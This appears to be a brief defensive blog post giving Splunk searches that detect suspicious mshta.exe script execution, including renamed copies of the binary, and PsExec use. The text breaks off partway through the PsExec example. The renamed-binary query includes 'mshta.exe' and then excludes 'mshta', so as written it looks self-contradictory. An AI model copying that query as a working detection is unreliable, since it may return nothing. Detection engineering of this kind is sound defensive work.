Blu3_Team

Having signatures for common techniques is great but let's take it to the next level. Imagine if a script executable is simply copied with a new name, will your dectection still trigger? This is a good technique to keep in mind while creating searches. Take a look at the following Splunk search to detect mshta.exe with suspicious strings. index=edr mshta.exe getobject script (vbscript OR javascript) command_line!="" | table command_line process_path computer Works great, lasts a long time right, but a central match is the mshta.exe string. Here is another version which negates the mshta.exe to catch just those where the file has been renamed, which in my view would be a higher severity and I want to see those separately. index=edr mshta.exe getobject script (vbscript OR javascript) NOT mshta command_line!="" | table command_line process_path computer Here is another example to find the -accepteula string from sysinternals psexec. index=edr -acce...